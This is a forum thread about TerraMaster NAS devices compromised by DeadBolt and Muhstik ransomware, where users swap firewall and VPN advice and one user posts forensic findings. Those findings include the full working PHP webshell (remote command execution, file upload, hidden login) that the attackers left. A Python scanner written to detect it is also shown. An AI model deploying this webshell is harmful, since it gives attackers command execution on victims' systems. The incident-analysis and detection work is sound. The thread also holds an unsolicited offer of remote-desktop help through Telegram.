Urgent Notification about TNAS being Attacked by Ransomware

Roccia7
Posts: 62
Joined: 05 Mar 2020, 05:02
Italy

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Roccia7 »

I tried to configure the firewall, allowing some incoming IPs from my network. But when the filter is active, the system bar displays that the Internet is not connected. I have allowed all protocols.
What am I doing wrong?
Also, can I configure the firewall so that it allows me to use my DDNS incoming address? Is it possible to have a detailed tutorial with an explanation, so we understand what we are doing?
LaMosca
Posts: 0
Joined: 23 Jan 2022, 11:23

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by LaMosca »

Roccia7 wrote:
>

https://t.me/ApkStudios

If you want, send me a message or chat from the computer on Telegram... use this URL and I'll help you. I speak Spanish, not English, but I will still help you configure your TNAS.

I also think I'm going to create a video tutorial, but if you want, send me a message and I can help you via AnyDesk or TeamViewer.

My Telegram is https://t.me/ApkStudios
Strasbdj
Posts: 0
Joined: 06 Mar 2022, 22:47

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Strasbdj »

How do I reinstall or upgrade my system if I can't even log into TOS? I've tried following the actions on these forums as well as the directions provided by TerraMaster, but I always end up at the DEADBOLT screen.

System info
TOS v3.12
TNAS F2-220 with 2x 4TB NAS drives

Please help, thank you.
Charlie_Croker
Posts: 105
Joined: 07 Oct 2020, 19:05

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Charlie_Croker »

Roccia7 wrote:
> I tried to configure the firewall, allowing some incoming IPs from my
> network. But when the filter is active, the system bar displays that the
> Internet is not connected. I have allowed all protocols.
> What am I doing wrong?
> Also, can I configure the firewall so that it allows me to use my DDNS
> incoming address? Is it possible to have a detailed tutorial with an explanation,
> so we understand what we are doing?

Ok, so does your router support acting as a VPN server?
If so, set it up; then, from outside your network, you should be able to VPN into it and access your NAS etc.
Now set your firewall rules on the TNAS to only accept local IP access and you should be sorted.
I live and work in Saudi, but my home is in the UK. I have 3 NAS drives in the UK (got my first NAS in 2014) and have never had a successful ransomware attack.
1st line of defence is a very good router. NEVER rely on the one your Internet Provider supplied: they are the cheapest possible device they could buy and rarely get a firmware update.
deex
Posts: 6
Joined: 08 Aug 2021, 23:27

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by deex »

Some updates to find out more about the attackers; maybe this will help with an investigation by Interpol.

After I dug deeper into the hard disk, I found some deleted files of the attacker.
The IP address that was used to attack my NAS was 191.101.210.172; it leads to an Australian VPN provider (Servers Australia Pty. Ltd).
https://imgur.com/a/olGzsst

Some more of what they did on my NAS.

They deleted:
".zloginit.1145" in /etc/tos/scripts
"m1.php" in www
"IP address" in /etc/sysconfig/records

Furthermore, they manipulated the "db-tool" file (original location unknown).

They created the file:
"index.php" in "/usr/www/tos/"

I wonder a bit why I wasn't able to find logs in /var/logs, even with a deep recovery.
deex
Posts: 6
Joined: 08 Aug 2021, 23:27

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by deex »

Furthermore, it seems that the first attacks did not happen on 28.02; the first appeared on 07.01 with the ransomware "Muhstik Ransomware".
So overall, two attacks in one month.

Why Muhstik?
Because I found the Base64 encrypted tag inside the uploaded file .m.php on 07.01.
https://imgur.com/a/PTLJx1b

For some reason, they were able to upload a PHP file and some data gibberish, but it seems they failed to encrypt the NAS on that date.

The whole payload was (I hope that will help to see what they tried to do):

[code]
@session_start(); error_reporting(0);$auth_pass = "7417088120f026d02019047766a2fda9"; function printLogin() { echo "<h1>Not Found</h1>"; echo "<p>The requested URL was not found on this server.</p>"; echo "<hr>"; echo "<address>Apache Server at ". $_SERVER['HTTP_HOST'] . " Port 80</address>"; echo "<style>"; echo "input { margin:0;background-color:#fff;border:1px solid #fff; }"; echo "</style>"; echo "<center>"; echo "<form method=post>"; echo "<input type=password name=pass>"; echo "</form></center>"; exit;}if (isset($_GET['wie'])) { $arr = array("who" => array( "os_name" => php_uname('s'), "uname_version_info" => php_uname('v'), "machine_type" => php_uname('m'), "kernel" => php_uname('r'), "php_uname" => php_uname(), "is64bit" => PHP_INT_SIZE === 4 ? false : true )); print(json_encode($arr)); exit;} elseif (isset($_GET['knal'])) { $comd = $_GET['knal']; echo "<pre><font size=3 color=#000000>" . shell_exec($comd) . "</font></pre>"; exit;} elseif (isset($_POST['submit'])) { $uploaddir = pwd(); if (!$name = $_POST['newname']) { $name = $_FILES['userfile']['name']; } move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name); if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $name)) { echo "Upload Failed"; } else { echo "Upload Success to " . $uploaddir . $name . " :D "; } exit;}if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])] )) { if(empty($auth_pass) || (isset( $_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; } else { printLogin(); }}echo "<title>UnKnown - muhstik</title><br>";$cur_user = "(" . get_current_user() . ")";echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";function pwd(){ $cwd = getcwd(); if ($u = strrpos($cwd, '/')) { if ($u != strlen($cwd) - 1) { return $cwd . 
'/'; } else { return $cwd; } ; } elseif ($u = strrpos($cwd, '\\')) { if ($u != strlen($cwd) - 1) { return $cwd . '\\'; } else { return $cwd; } ; } ;}echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';if (isset($_POST['command'])) { $cmd = $_POST['cmd']; echo "<pre><font size=3 color=#000000>" . shell_exec($cmd) . "</font></pre>";} else { if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { echo "<pre><font size=3 color=#000000>" . shell_exec('dir') . "</font></pre>"; } else { echo "<pre><font size=3 color=#000000>" . shell_exec('ls -la') . "</font></pre>"; }}[/code]


These are all the files they created, but it seems that they failed, because of the 0-byte files.
https://imgur.com/a/QmuQWbc

Furthermore, they modified and finally deleted:
/etc/crontabs/root
New content: https://imgur.com/a/W4kDBsm

/etc/crontabs/rc.local
New content: https://imgur.com/a/KBVGp6W

And they modified and finally deleted /usr/www/include/class/mobile.class.php.
The code is too long to provide screenshots here.
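A small defensive scanner for the traits visible in the payload quoted above (fake 404 login page, md5-compared hard-coded password, shell_exec fed by a request parameter, "muhstik" banner, arbitrary file upload). This is an added example, not code from the thread or from TerraMaster; the regexes are my own assumptions, not a vendor signature, and the two sample files it scans are constructed.

```python
"""Scan a TOS web root for PHP files carrying the traits of the posted webshell."""
import os
import re
import tempfile

# Traits taken from the payload above; the regexes are assumptions, tune before relying on them.
INDICATORS = {
    "cmd_from_request": re.compile(
        r"\b(shell_exec|system|passthru|exec|popen)\s*\(\s*\$(_GET|_POST|_REQUEST|cmd|comd)\b"),
    "md5_password_gate": re.compile(r"md5\s*\(\s*\$_POST\[[^\]]*\]\s*\)\s*==\s*\$auth_pass"),
    "hardcoded_md5": re.compile(r"\$auth_pass\s*=\s*[\"'][0-9a-f]{32}[\"']"),
    "fake_404_login": re.compile(r"<h1>Not Found</h1>.*?<input type=password", re.S),
    "muhstik_banner": re.compile(r"muhstik", re.I),
    "file_upload": re.compile(r"\bmove_uploaded_file\s*\("),  # common in legitimate code
}
WEIGHTS = {"file_upload": 1}   # every other indicator counts 2
THRESHOLD = 3                  # a lone upload handler never reaches this

def scan_php_source(src):
    """Return the names of the indicators found in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]

def score(hits):
    return sum(WEIGHTS.get(h, 2) for h in hits)

def scan_tree(root):
    """Walk root for .php files; return {path: hits} for files scoring >= THRESHOLD."""
    suspects = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(".php"):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = scan_php_source(fh.read())
                if score(hits) >= THRESHOLD:
                    suspects[path] = hits
    return suspects

# Constructed samples: a benign upload handler and a fragment mimicking the posted shell.
BENIGN = "<?php move_uploaded_file($_FILES['f']['tmp_name'], '/tmp/' . basename($_FILES['f']['name']));"
SHELL = ('<?php $auth_pass = "0123456789abcdef0123456789abcdef";'
         ' if (md5($_POST["pass"]) == $auth_pass) { $_SESSION["ok"] = true; }'
         ' if (isset($_GET["knal"])) { echo shell_exec($_GET["knal"]); }'
         ' echo "<title>UnKnown - muhstik</title>";')

def demo():
    """Write both samples into a temporary web root and return the flagged files."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "tos"))
        with open(os.path.join(root, "upload.php"), "w") as fh: fh.write(BENIGN)
        with open(os.path.join(root, "tos", "index.php"), "w") as fh: fh.write(SHELL)
        return {os.path.relpath(p, root): h for p, h in scan_tree(root).items()}

if __name__ == "__main__":
    print(demo())
```

Run it against /usr/www on a NAS you suspect (for example `scan_tree("/usr/www")`) and review every flagged file by hand; the threshold keeps an ordinary upload handler out of the report.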
deex
Posts: 6
Joined: 08 Aug 2021, 23:27

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by deex »

So, last post for some days. I don't know what the original content of the mobile class was,

but... I'm a bit confused about the running of SU and MKDIR 777; that doesn't look quite safe, right?

https://imgur.com/a/HbDMcYU
deex
Posts: 6
Joined: 08 Aug 2021, 23:27

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by deex »

Again some update: I found only one posting about the payload, where the attacker ran into a honeypot.

https://blog.stevenyu.tw/2022/03/02/%E6 ... %E6%83%B9/

So, as Steven Yu mentioned, it is an attempt to implement a webshell via a POST parameter, and they had success. The sad thing is that because of the missing logs, it is not possible for me to see on which entry they deployed it. I hope you were able to find it and fix it within the latest upgrades.
Roccia7
Posts: 62
Joined: 05 Mar 2020, 05:02
Italy

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Roccia7 »

LaMosca wrote:
> Roccia7 wrote:
> >
>
> https://t.me/ApkStudios

Thank you so much for the proposal and the help you offer me, but I'm not thinking about making the changes now because I am waiting for the release of TOS 5. But I also look forward to your tutorial; I think it could be useful to others too.

Charlie_Croker wrote:
> Roccia7 wrote:
> >
>
Yes, I have a Fritz!Box 7590 that already has its own VPN. I also tried to configure the firewall of the NAS as you said, but afterwards the NAS does not connect to the internet anymore.
Charlie_Croker
Posts: 105
Joined: 07 Oct 2020, 19:05

Re: Urgent Notification about TNAS being Attacked by Ransomware

Post by Charlie_Croker »

Roccia7 wrote:
> LaMosca wrote:
> > Roccia7 wrote:
> > >
> >
> > https://t.me/ApkStudios
>
> Thank you so much for the proposal and the help you offer me, but I'm not thinking about
> making the changes now because I am waiting for the release of TOS 5. But I also look
> forward to your tutorial; I think it could be useful to others too.
>
> Charlie_Croker wrote:
> > Roccia7 wrote:
> > >
> >
> Yes, I have a Fritz!Box 7590 that already has its own VPN. I also tried to configure the
> firewall of the NAS as you said, but afterwards the NAS does not connect to the internet anymore.

Why do you need your NAS to connect to the Internet? You will be able to access your home network (including the NAS) via the VPN.